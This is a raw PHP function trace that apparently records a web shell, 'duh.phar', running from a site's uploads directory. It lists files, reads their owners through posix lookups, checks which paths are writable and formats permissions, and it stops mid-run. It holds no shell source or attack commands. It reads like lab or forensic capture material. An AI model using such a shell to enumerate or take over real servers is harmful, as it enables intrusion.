2 47 0 0.002746 492016 realpath 0 /var/www/html/uploads/duh.phar 35 1 '.'
2 47 1 0.002759 492096
2 47 R '/var/www/html/uploads'
2 48 0 0.002772 492336 realpath 0 /var/www/html/uploads/duh.phar 35 1 '.'
2 48 1 0.002784 492416
2 48 R '/var/www/html/uploads'
2 49 0 0.002798 492464 realpath 0 /var/www/html/uploads/duh.phar 35 1 '.'
2 49 1 0.002810 492544
2 49 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.phar 37 $filex = []
1 A /var/www/html/uploads/duh.phar 38 $dirx = []
2 50 0 0.002851 491680 opendir 0 /var/www/html/uploads/duh.phar 40 1 '.'
2 50 1 0.002873 492072
2 50 R resource(5) of type (stream)
1 A /var/www/html/uploads/duh.phar 40 $handle = resource(5) of type (stream)
2 51 0 0.002901 492040 readdir 0 /var/www/html/uploads/duh.phar 40 1 resource(5) of type (stream)
2 51 1 0.002921 492112
2 51 R '..'
1 A /var/www/html/uploads/duh.phar 40 $file = '..'
2 52 0 0.002944 492072 is_dir 0 /var/www/html/uploads/duh.phar 40 1 '..'
2 52 1 0.002959 492120
2 52 R TRUE
1 A /var/www/html/uploads/duh.phar 40 $dirx[] .= '..'
2 53 0 0.002982 492488 readdir 0 /var/www/html/uploads/duh.phar 40 1 resource(5) of type (stream)
2 53 1 0.002995 492568
2 53 R 'duh.phar'
1 A /var/www/html/uploads/duh.phar 40 $file = 'duh.phar'
2 54 0 0.003018 492496 is_dir 0 /var/www/html/uploads/duh.phar 40 1 'duh.phar'
2 54 1 0.003032 492544
2 54 R FALSE
1 A /var/www/html/uploads/duh.phar 40 $filex[] .= 'duh.phar'
2 55 0 0.003055 492920 readdir 0 /var/www/html/uploads/duh.phar 40 1 resource(5) of type (stream)
2 55 1 0.003068 492992
2 55 R '.'
1 A /var/www/html/uploads/duh.phar 40 $file = '.'
2 56 0 0.003090 492912 is_dir 0 /var/www/html/uploads/duh.phar 40 1 '.'
2 56 1 0.003103 492944
2 56 R TRUE
1 A /var/www/html/uploads/duh.phar 40 $dirx[] .= '.'
2 57 0 0.003125 492936 readdir 0 /var/www/html/uploads/duh.phar 40 1 resource(5) of type (stream)
2 57 1 0.003138 493016
2 57 R 'prepend.php'
1 A /var/www/html/uploads/duh.phar 40 $file = 'prepend.php'
2 58 0 0.003161 492944 is_dir 0 /var/www/html/uploads/duh.phar 40 1 'prepend.php'
2 58 1 0.003176 492992
2 58 R FALSE
1 A /var/www/html/uploads/duh.phar 40 $filex[] .= 'prepend.php'
2 59 0 0.003199 492992 readdir 0 /var/www/html/uploads/duh.phar 40 1 resource(5) of type (stream)
2 59 1 0.003212 493064
2 59 R 'data'
1 A /var/www/html/uploads/duh.phar 40 $file = 'data'
2 60 0 0.003234 492984 is_dir 0 /var/www/html/uploads/duh.phar 40 1 'data'
2 60 1 0.003247 493016
2 60 R TRUE
1 A /var/www/html/uploads/duh.phar 40 $dirx[] .= 'data'
2 61 0 0.003269 493008 readdir 0 /var/www/html/uploads/duh.phar 40 1 resource(5) of type (stream)
2 61 1 0.003282 493088
2 61 R '.htaccess'
1 A /var/www/html/uploads/duh.phar 40 $file = '.htaccess'
2 62 0 0.003305 493016 is_dir 0 /var/www/html/uploads/duh.phar 40 1 '.htaccess'
2 62 1 0.003334 493064
2 62 R FALSE
1 A /var/www/html/uploads/duh.phar 40 $filex[] .= '.htaccess'
2 63 0 0.003357 493064 readdir 0 /var/www/html/uploads/duh.phar 40 1 resource(5) of type (stream)
2 63 1 0.003371 493104
2 63 R FALSE
1 A /var/www/html/uploads/duh.phar 40 $file = FALSE
2 64 0 0.003393 493048 asort 0 /var/www/html/uploads/duh.phar 40 1 [0 => 'duh.phar', 1 => 'prepend.php', 2 => '.htaccess']
2 64 1 0.003410 493080
2 64 R TRUE
2 65 0 0.003423 493072 asort 0 /var/www/html/uploads/duh.phar 40 1 [0 => '..', 1 => '.', 2 => 'data']
2 65 1 0.003438 493104
2 65 R TRUE
1 A /var/www/html/uploads/duh.phar 40 $i = 0
2 66 0 0.003460 493072 function_exists 0 /var/www/html/uploads/duh.phar 41 1 'posix_getpwuid'
2 66 1 0.003473 493112
2 66 R TRUE
2 67 0 0.003485 493072 function_exists 0 /var/www/html/uploads/duh.phar 41 1 'posix_getgrgid'
2 67 1 0.003498 493112
2 67 R TRUE
2 68 0 0.003510 493072 fileowner 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 68 1 0.003524 493104
2 68 R 0
2 69 0 0.003537 493064 posix_getpwuid 0 /var/www/html/uploads/duh.phar 41 1 0
2 69 1 0.003563 493864
2 69 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.phar 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 70 0 0.003604 493832 filegroup 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 70 1 0.003617 493872
2 70 R 0
2 71 0 0.003629 493832 posix_getgrgid 0 /var/www/html/uploads/duh.phar 41 1 0
2 71 1 0.003651 494488
2 71 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.phar 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 72 0 0.003690 494520 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 72 1 0.003703 494600
2 72 R '/var/www/html/uploads'
2 73 0 0.003718 494616 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 73 1 0.003731 494696
2 73 R '/var/www/html/uploads'
2 74 0 0.003745 494680 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 74 1 0.003757 494760
2 74 R '/var/www/html/uploads'
2 75 0 0.003772 495096 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 75 1 0.003784 495176
2 75 R '/var/www/html/uploads'
2 76 0 0.003797 495096 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 76 1 0.003809 495176
2 76 R '/var/www/html/uploads'
2 77 0 0.003823 495352 get_color 1 /var/www/html/uploads/duh.phar 41 1 '.'
3 78 0 0.003836 495352 is_writable 0 /var/www/html/uploads/duh.phar 56 1 '.'
3 78 1 0.003852 495392
3 78 R TRUE
2 A /var/www/html/uploads/duh.phar 56 $c = '#ccff00'
3 79 0 0.003875 495352 is_writable 0 /var/www/html/uploads/duh.phar 56 1 '.'
3 79 1 0.003889 495392
3 79 R TRUE
3 80 0 0.003901 495352 is_writable 0 /var/www/html/uploads/duh.phar 56 1 '.'
3 80 1 0.003914 495392
3 80 R TRUE
2 77 1 0.003927 495352
2 77 R '#ccff00'
2 81 0 0.003940 495352 perms 1 /var/www/html/uploads/duh.phar 41 1 '.'
3 82 0 0.003952 495352 file_exists 0 /var/www/html/uploads/duh.phar 57 1 '.'
3 82 1 0.003966 495392
3 82 R TRUE
3 83 0 0.003978 495352 fileperms 0 /var/www/html/uploads/duh.phar 57 1 '.'
3 83 1 0.003991 495392
3 83 R 16895
3 84 0 0.004003 495352 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 16895
3 84 1 0.004016 495736
3 84 R '40777'
3 85 0 0.004028 495672 substr 0 /var/www/html/uploads/duh.phar 57 2 '40777' -4
3 85 1 0.004041 495768
3 85 R '0777'
2 81 1 0.004053 495384
2 81 R '0777'
2 86 0 0.004066 495480 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 86 1 0.004079 495560
2 86 R '/var/www/html/uploads'
2 87 0 0.004093 495480 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 87 1 0.004105 495560
2 87 R '/var/www/html/uploads'
2 88 0 0.004119 495736 perms 1 /var/www/html/uploads/duh.phar 41 1 '.'
3 89 0 0.004130 495736 file_exists 0 /var/www/html/uploads/duh.phar 57 1 '.'
3 89 1 0.004143 495776
3 89 R TRUE
3 90 0 0.004156 495736 fileperms 0 /var/www/html/uploads/duh.phar 57 1 '.'
3 90 1 0.004168 495776
3 90 R 16895
3 91 0 0.004180 495736 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 16895
3 91 1 0.004193 496120
3 91 R '40777'
3 92 0 0.004205 496056 substr 0 /var/www/html/uploads/duh.phar 57 2 '40777' -4
3 92 1 0.004217 496152
3 92 R '0777'
2 88 1 0.004230 495768
2 88 R '0777'
1 A /var/www/html/uploads/duh.phar 41 $i++
2 93 0 0.004253 494456 function_exists 0 /var/www/html/uploads/duh.phar 41 1 'posix_getpwuid'
2 93 1 0.004266 494496
2 93 R TRUE
2 94 0 0.004278 494456 function_exists 0 /var/www/html/uploads/duh.phar 41 1 'posix_getgrgid'
2 94 1 0.004290 494496
2 94 R TRUE
2 95 0 0.004302 494456 fileowner 0 /var/www/html/uploads/duh.phar 41 1 '..'
2 95 1 0.004316 494496
2 95 R 0
2 96 0 0.004328 494456 posix_getpwuid 0 /var/www/html/uploads/duh.phar 41 1 0
2 96 1 0.004350 495256
2 96 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.phar 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 97 0 0.004398 494456 filegroup 0 /var/www/html/uploads/duh.phar 41 1 '..'
2 97 1 0.004412 494496
2 97 R 0
2 98 0 0.004424 494456 posix_getgrgid 0 /var/www/html/uploads/duh.phar 41 1 0
2 98 1 0.004446 495112
2 98 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.phar 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 99 0 0.004483 494520 realpath 0 /var/www/html/uploads/duh.phar 41 1 '..'
2 99 1 0.004497 494592
2 99 R '/var/www/html'
2 100 0 0.004511 494616 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 100 1 0.004524 494696
2 100 R '/var/www/html/uploads'
2 101 0 0.004538 494680 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 101 1 0.004551 494760
2 101 R '/var/www/html/uploads'
2 102 0 0.004565 495096 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 102 1 0.004577 495176
2 102 R '/var/www/html/uploads'
2 103 0 0.004591 495096 realpath 0 /var/www/html/uploads/duh.phar 41 1 '..'
2 103 1 0.004603 495168
2 103 R '/var/www/html'
2 104 0 0.004618 495352 get_color 1 /var/www/html/uploads/duh.phar 41 1 '..'
3 105 0 0.004630 495352 is_writable 0 /var/www/html/uploads/duh.phar 56 1 '..'
3 105 1 0.004645 495392
3 105 R TRUE
2 A /var/www/html/uploads/duh.phar 56 $c = '#ccff00'
3 106 0 0.004668 495352 is_writable 0 /var/www/html/uploads/duh.phar 56 1 '..'
3 106 1 0.004682 495392
3 106 R TRUE
3 107 0 0.004694 495352 is_writable 0 /var/www/html/uploads/duh.phar 56 1 '..'
3 107 1 0.004708 495392
3 107 R TRUE
2 104 1 0.004720 495352
2 104 R '#ccff00'
2 108 0 0.004734 495352 perms 1 /var/www/html/uploads/duh.phar 41 1 '..'
3 109 0 0.004745 495352 file_exists 0 /var/www/html/uploads/duh.phar 57 1 '..'
3 109 1 0.004759 495392
3 109 R TRUE
3 110 0 0.004771 495352 fileperms 0 /var/www/html/uploads/duh.phar 57 1 '..'
3 110 1 0.004783 495392
3 110 R 16895
3 111 0 0.004795 495352 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 16895
3 111 1 0.004808 495736
3 111 R '40777'
3 112 0 0.004820 495672 substr 0 /var/www/html/uploads/duh.phar 57 2 '40777' -4
3 112 1 0.004833 495768
3 112 R '0777'
2 108 1 0.004845 495384
2 108 R '0777'
2 113 0 0.004858 495480 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 113 1 0.004871 495560
2 113 R '/var/www/html/uploads'
2 114 0 0.004885 495480 realpath 0 /var/www/html/uploads/duh.phar 41 1 '..'
2 114 1 0.004897 495552
2 114 R '/var/www/html'
2 115 0 0.004911 495736 perms 1 /var/www/html/uploads/duh.phar 41 1 '..'
3 116 0 0.004922 495736 file_exists 0 /var/www/html/uploads/duh.phar 57 1 '..'
3 116 1 0.004936 495776
3 116 R TRUE
3 117 0 0.004948 495736 fileperms 0 /var/www/html/uploads/duh.phar 57 1 '..'
3 117 1 0.004960 495776
3 117 R 16895
3 118 0 0.004972 495736 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 16895
3 118 1 0.004984 496120
3 118 R '40777'
3 119 0 0.004996 496056 substr 0 /var/www/html/uploads/duh.phar 57 2 '40777' -4
3 119 1 0.005008 496152
3 119 R '0777'
2 115 1 0.005021 495768
2 115 R '0777'
1 A /var/www/html/uploads/duh.phar 41 $i++
2 120 0 0.005044 494456 function_exists 0 /var/www/html/uploads/duh.phar 41 1 'posix_getpwuid'
2 120 1 0.005057 494496
2 120 R TRUE
2 121 0 0.005070 494456 function_exists 0 /var/www/html/uploads/duh.phar 41 1 'posix_getgrgid'
2 121 1 0.005082 494496
2 121 R TRUE
2 122 0 0.005094 494456 fileowner 0 /var/www/html/uploads/duh.phar 41 1 'data'
2 122 1 0.005107 494496
2 122 R 0
2 123 0 0.005119 494456 posix_getpwuid 0 /var/www/html/uploads/duh.phar 41 1 0
2 123 1 0.005141 495256
2 123 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.phar 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 124 0 0.005182 494456 filegroup 0 /var/www/html/uploads/duh.phar 41 1 'data'
2 124 1 0.005194 494496
2 124 R 0
2 125 0 0.005206 494456 posix_getgrgid 0 /var/www/html/uploads/duh.phar 41 1 0
2 125 1 0.005226 495112
2 125 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.phar 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 126 0 0.005264 494536 realpath 0 /var/www/html/uploads/duh.phar 41 1 'data'
2 126 1 0.005279 494624
2 126 R '/var/www/html/uploads/data'
2 127 0 0.005294 494648 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 127 1 0.005307 494728
2 127 R '/var/www/html/uploads'
2 128 0 0.005321 494712 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 128 1 0.005334 494792
2 128 R '/var/www/html/uploads'
2 129 0 0.005348 495096 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 129 1 0.005360 495176
2 129 R '/var/www/html/uploads'
2 130 0 0.005374 495096 realpath 0 /var/www/html/uploads/duh.phar 41 1 'data'
2 130 1 0.005386 495184
2 130 R '/var/www/html/uploads/data'
2 131 0 0.005401 495480 get_color 1 /var/www/html/uploads/duh.phar 41 1 'data'
3 132 0 0.005413 495480 is_writable 0 /var/www/html/uploads/duh.phar 56 1 'data'
3 132 1 0.005428 495520
3 132 R TRUE
2 A /var/www/html/uploads/duh.phar 56 $c = '#ccff00'
3 133 0 0.005450 495480 is_writable 0 /var/www/html/uploads/duh.phar 56 1 'data'
3 133 1 0.005464 495520
3 133 R TRUE
3 134 0 0.005477 495480 is_writable 0 /var/www/html/uploads/duh.phar 56 1 'data'
3 134 1 0.005490 495520
3 134 R TRUE
2 131 1 0.005502 495480
2 131 R '#ccff00'
2 135 0 0.005516 495480 perms 1 /var/www/html/uploads/duh.phar 41 1 'data'
3 136 0 0.005527 495480 file_exists 0 /var/www/html/uploads/duh.phar 57 1 'data'
3 136 1 0.005541 495520
3 136 R TRUE
3 137 0 0.005554 495480 fileperms 0 /var/www/html/uploads/duh.phar 57 1 'data'
3 137 1 0.005565 495520
3 137 R 16895
3 138 0 0.005578 495480 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 16895
3 138 1 0.005590 495864
3 138 R '40777'
3 139 0 0.005603 495800 substr 0 /var/www/html/uploads/duh.phar 57 2 '40777' -4
3 139 1 0.005615 495896
3 139 R '0777'
2 135 1 0.005628 495512
2 135 R '0777'
2 140 0 0.005664 495480 realpath 0 /var/www/html/uploads/duh.phar 41 1 '.'
2 140 1 0.005677 495560
2 140 R '/var/www/html/uploads'
2 141 0 0.005692 495736 realpath 0 /var/www/html/uploads/duh.phar 41 1 'data'
2 141 1 0.005705 495824
2 141 R '/var/www/html/uploads/data'
2 142 0 0.005719 495736 perms 1 /var/www/html/uploads/duh.phar 41 1 'data'
3 143 0 0.005730 495736 file_exists 0 /var/www/html/uploads/duh.phar 57 1 'data'
3 143 1 0.005745 495776
3 143 R TRUE
3 144 0 0.005757 495736 fileperms 0 /var/www/html/uploads/duh.phar 57 1 'data'
3 144 1 0.005769 495776
3 144 R 16895
3 145 0 0.005782 495736 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 16895
3 145 1 0.005794 496120
3 145 R '40777'
3 146 0 0.005806 496056 substr 0 /var/www/html/uploads/duh.phar 57 2 '40777' -4
3 146 1 0.005819 496152
3 146 R '0777'
2 142 1 0.005831 495768
2 142 R '0777'
1 A /var/www/html/uploads/duh.phar 41 $i++
2 147 0 0.005984 494456 function_exists 0 /var/www/html/uploads/duh.phar 42 1 'posix_getpwuid'
2 147 1 0.005999 494496
2 147 R TRUE
2 148 0 0.006011 494456 function_exists 0 /var/www/html/uploads/duh.phar 42 1 'posix_getgrgid'
2 148 1 0.006025 494496
2 148 R TRUE
2 149 0 0.006037 494456 fileowner 0 /var/www/html/uploads/duh.phar 42 1 '.htaccess'
2 149 1 0.006052 494504
2 149 R 0
2 150 0 0.006064 494464 posix_getpwuid 0 /var/www/html/uploads/duh.phar 42 1 0
2 150 1 0.006097 495264
2 150 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.phar 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 151 0 0.006139 494464 filegroup 0 /var/www/html/uploads/duh.phar 42 1 '.htaccess'
2 151 1 0.006152 494504
2 151 R 0
2 152 0 0.006168 494464 posix_getgrgid 0 /var/www/html/uploads/duh.phar 42 1 0
2 152 1 0.006190 495120
2 152 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.phar 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 153 0 0.006224 494544 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 153 1 0.006238 494624
2 153 R '/var/www/html/uploads'
2 154 0 0.006253 494656 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 154 1 0.006266 494736
2 154 R '/var/www/html/uploads'
2 155 0 0.006279 494720 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 155 1 0.006291 494800
2 155 R '/var/www/html/uploads'
2 156 0 0.006306 495104 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 156 1 0.006318 495184
2 156 R '/var/www/html/uploads'
2 157 0 0.006332 495232 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.htaccess'
2 157 1 0.006348 495320
2 157 R '/var/www/html/uploads/.htaccess'
2 158 0 0.006364 495488 get_color 1 /var/www/html/uploads/duh.phar 42 1 '.htaccess'
3 159 0 0.006376 495488 is_writable 0 /var/www/html/uploads/duh.phar 56 1 '.htaccess'
3 159 1 0.006391 495528
3 159 R FALSE
3 160 0 0.006405 495488 is_writable 0 /var/www/html/uploads/duh.phar 56 1 '.htaccess'
3 160 1 0.006419 495528
3 160 R FALSE
3 161 0 0.006431 495488 is_readable 0 /var/www/html/uploads/duh.phar 56 1 '.htaccess'
3 161 1 0.006445 495528
3 161 R TRUE
2 A /var/www/html/uploads/duh.phar 56 $c = ''
3 162 0 0.006469 495488 is_writable 0 /var/www/html/uploads/duh.phar 56 1 '.htaccess'
3 162 1 0.006483 495528
3 162 R FALSE
3 163 0 0.006496 495488 is_readable 0 /var/www/html/uploads/duh.phar 56 1 '.htaccess'
3 163 1 0.006509 495528
3 163 R TRUE
2 158 1 0.006522 495488
2 158 R ''
2 164 0 0.006535 495488 perms 1 /var/www/html/uploads/duh.phar 42 1 '.htaccess'
3 165 0 0.006547 495488 file_exists 0 /var/www/html/uploads/duh.phar 57 1 '.htaccess'
3 165 1 0.006561 495528
3 165 R TRUE
3 166 0 0.006574 495488 fileperms 0 /var/www/html/uploads/duh.phar 57 1 '.htaccess'
3 166 1 0.006586 495528
3 166 R 33188
3 167 0 0.006598 495488 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 33188
3 167 1 0.006611 495872
3 167 R '100644'
3 168 0 0.006623 495808 substr 0 /var/www/html/uploads/duh.phar 57 2 '100644' -4
3 168 1 0.006636 495904
3 168 R '0644'
2 164 1 0.006649 495520
2 164 R '0644'
2 169 0 0.006661 495744 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 169 1 0.006674 495824
2 169 R '/var/www/html/uploads'
2 170 0 0.006688 495744 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.htaccess'
2 170 1 0.006702 495832
2 170 R '/var/www/html/uploads/.htaccess'
2 171 0 0.006717 495744 perms 1 /var/www/html/uploads/duh.phar 42 1 '.htaccess'
3 172 0 0.006728 495744 file_exists 0 /var/www/html/uploads/duh.phar 57 1 '.htaccess'
3 172 1 0.006742 495784
3 172 R TRUE
3 173 0 0.006755 495744 fileperms 0 /var/www/html/uploads/duh.phar 57 1 '.htaccess'
3 173 1 0.006767 495784
3 173 R 33188
3 174 0 0.006779 495744 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 33188
3 174 1 0.006791 496128
3 174 R '100644'
3 175 0 0.006803 496064 substr 0 /var/www/html/uploads/duh.phar 57 2 '100644' -4
3 175 1 0.006816 496160
3 175 R '0644'
2 171 1 0.006829 495776
2 171 R '0644'
2 176 0 0.006842 494464 function_exists 0 /var/www/html/uploads/duh.phar 42 1 'posix_getpwuid'
2 176 1 0.006855 494504
2 176 R TRUE
2 177 0 0.006868 494464 function_exists 0 /var/www/html/uploads/duh.phar 42 1 'posix_getgrgid'
2 177 1 0.006880 494504
2 177 R TRUE
2 178 0 0.006893 494464 fileowner 0 /var/www/html/uploads/duh.phar 42 1 'duh.phar'
2 178 1 0.006907 494504
2 178 R 1000
2 179 0 0.006919 494464 posix_getpwuid 0 /var/www/html/uploads/duh.phar 42 1 1000
2 179 1 0.006949 495280
2 179 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.phar 42 $own = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2 180 0 0.006996 494480 filegroup 0 /var/www/html/uploads/duh.phar 42 1 'duh.phar'
2 180 1 0.007009 494520
2 180 R 1000
2 181 0 0.007021 494480 posix_getgrgid 0 /var/www/html/uploads/duh.phar 42 1 1000
2 181 1 0.007052 495136
2 181 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/duh.phar 42 $grp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2 182 0 0.007087 494560 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 182 1 0.007100 494640
2 182 R '/var/www/html/uploads'
2 183 0 0.007115 494672 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 183 1 0.007128 494752
2 183 R '/var/www/html/uploads'
2 184 0 0.007143 494736 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 184 1 0.007155 494816
2 184 R '/var/www/html/uploads'
2 185 0 0.007169 495120 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 185 1 0.007181 495200
2 185 R '/var/www/html/uploads'
2 186 0 0.007195 495248 realpath 0 /var/www/html/uploads/duh.phar 42 1 'duh.phar'
2 186 1 0.007208 495336
2 186 R '/var/www/html/uploads/duh.phar'
2 187 0 0.007223 495504 get_color 1 /var/www/html/uploads/duh.phar 42 1 'duh.phar'
3 188 0 0.007236 495504 is_writable 0 /var/www/html/uploads/duh.phar 56 1 'duh.phar'
3 188 1 0.007251 495544
3 188 R FALSE
3 189 0 0.007264 495504 is_writable 0 /var/www/html/uploads/duh.phar 56 1 'duh.phar'
3 189 1 0.007278 495544
3 189 R FALSE
3 190 0 0.007291 495504 is_readable 0 /var/www/html/uploads/duh.phar 56 1 'duh.phar'
3 190 1 0.007305 495544
3 190 R TRUE
2 A /var/www/html/uploads/duh.phar 56 $c = ''
3 191 0 0.007329 495504 is_writable 0 /var/www/html/uploads/duh.phar 56 1 'duh.phar'
3 191 1 0.007343 495544
3 191 R FALSE
3 192 0 0.007355 495504 is_readable 0 /var/www/html/uploads/duh.phar 56 1 'duh.phar'
3 192 1 0.007369 495544
3 192 R TRUE
2 187 1 0.007382 495504
2 187 R ''
2 193 0 0.007394 495504 perms 1 /var/www/html/uploads/duh.phar 42 1 'duh.phar'
3 194 0 0.007406 495504 file_exists 0 /var/www/html/uploads/duh.phar 57 1 'duh.phar'
3 194 1 0.007420 495544
3 194 R TRUE
3 195 0 0.007433 495504 fileperms 0 /var/www/html/uploads/duh.phar 57 1 'duh.phar'
3 195 1 0.007444 495544
3 195 R 33204
3 196 0 0.007457 495504 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 33204
3 196 1 0.007469 495888
3 196 R '100664'
3 197 0 0.007482 495824 substr 0 /var/www/html/uploads/duh.phar 57 2 '100664' -4
3 197 1 0.007495 495920
3 197 R '0664'
2 193 1 0.007508 495536
2 193 R '0664'
2 198 0 0.007521 495760 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 198 1 0.007534 495840
2 198 R '/var/www/html/uploads'
2 199 0 0.007548 495760 realpath 0 /var/www/html/uploads/duh.phar 42 1 'duh.phar'
2 199 1 0.007561 495848
2 199 R '/var/www/html/uploads/duh.phar'
2 200 0 0.007575 495760 perms 1 /var/www/html/uploads/duh.phar 42 1 'duh.phar'
3 201 0 0.007587 495760 file_exists 0 /var/www/html/uploads/duh.phar 57 1 'duh.phar'
3 201 1 0.007601 495800
3 201 R TRUE
3 202 0 0.007614 495760 fileperms 0 /var/www/html/uploads/duh.phar 57 1 'duh.phar'
3 202 1 0.007626 495800
3 202 R 33204
3 203 0 0.007638 495760 sprintf 0 /var/www/html/uploads/duh.phar 57 2 '%o' 33204
3 203 1 0.007651 496144
3 203 R '100664'
3 204 0 0.007663 496080 substr 0 /var/www/html/uploads/duh.phar 57 2 '100664' -4
3 204 1 0.007676 496176
3 204 R '0664'
2 200 1 0.007688 495792
2 200 R '0664'
2 205 0 0.007703 494480 function_exists 0 /var/www/html/uploads/duh.phar 42 1 'posix_getpwuid'
2 205 1 0.007716 494520
2 205 R TRUE
2 206 0 0.007728 494480 function_exists 0 /var/www/html/uploads/duh.phar 42 1 'posix_getgrgid'
2 206 1 0.007744 494520
2 206 R TRUE
2 207 0 0.007757 494480 fileowner 0 /var/www/html/uploads/duh.phar 42 1 'prepend.php'
2 207 1 0.007771 494520
2 207 R 0
2 208 0 0.007783 494480 posix_getpwuid 0 /var/www/html/uploads/duh.phar 42 1 0
2 208 1 0.007805 495280
2 208 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.phar 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 209 0 0.007853 494464 filegroup 0 /var/www/html/uploads/duh.phar 42 1 'prepend.php'
2 209 1 0.007866 494504
2 209 R 0
2 210 0 0.007879 494464 posix_getgrgid 0 /var/www/html/uploads/duh.phar 42 1 0
2 210 1 0.007901 495120
2 210 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.phar 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 211 0 0.007934 494544 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 211 1 0.007948 494624
2 211 R '/var/www/html/uploads'
2 212 0 0.007963 494688 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 212 1 0.007975 494768
2 212 R '/var/www/html/uploads'
2 213 0 0.007989 494784 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 213 1 0.008001 494864
2 213 R '/var/www/html/uploads'
2 214 0 0.008016 495104 realpath 0 /var/www/html/uploads/duh.phar 42 1 '.'
2 214 1 0.008028 495184
2 214 R '/var/www/html/uploads'
2 215 0 0.008042 495232 realpath 0 /var/www/html/uploads/duh.phar 42 1 'prepend.php'
2 215 1 0.008056 495328
2 215 R '/var/www/html/uploads/prepend.php'
2 216 0 0.008071 495488 get_color 1 /var/www/html/uploads/duh.phar 42 1 'prepend.php'
